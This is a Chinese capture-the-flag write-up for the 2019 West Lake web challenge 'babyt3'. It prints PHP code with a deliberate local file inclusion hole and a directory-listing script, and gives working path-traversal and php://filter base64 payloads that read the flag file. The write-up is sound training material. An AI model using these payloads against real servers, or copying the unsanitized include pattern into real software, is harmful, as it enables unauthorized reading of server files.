2019西湖論劍預選賽部分WP

時間  2019-11-18
標籤 西湖 預選賽 部分 简体版
原文   原文鏈接

Web

babyt3

點進連接發現提示php

include $_GET['file']

估計是文件包含漏洞html

嘗試包含index.php,發現一串base64編碼,解碼獲得編碼

<?php
    $a = @$_GET['file']; 
    if (!$a) { 
        $a = './templates/index.html'; 
    } 
    echo 'include $_GET[\'file\']';
     if (strpos('flag',$a)!==false) {  
        die('nonono'); 
    } 
    include $a; 
?>  
<!--hint: ZGlyLnBocA== -->

繼續解碼hint,獲得dir.php,繼續嘗試包含dir.php,又是一串base64,繼續解碼spa

<?php 
    $a = @$_GET['dir']; 
    if(!$a){ 
        $a = '/tmp'; 
    } 
var_dump(scandir($a));

用dir參數遍歷目錄 dir.php?dir=../../../code

讀取文件 ?file=../../../ffffflag_1s_Her4htm

或者繼續僞協議讀取?file=php://filter/read=convert.base64-encode/resource=../../../ffffflag_1s_Her4  而後再base64解碼。blog

flag{8dc25fd21c52958f777ce92409e2802a}
相關文章
相關標籤/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公眾號
   歡迎關注本站公眾號,獲取更多信息
聯繫我們 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程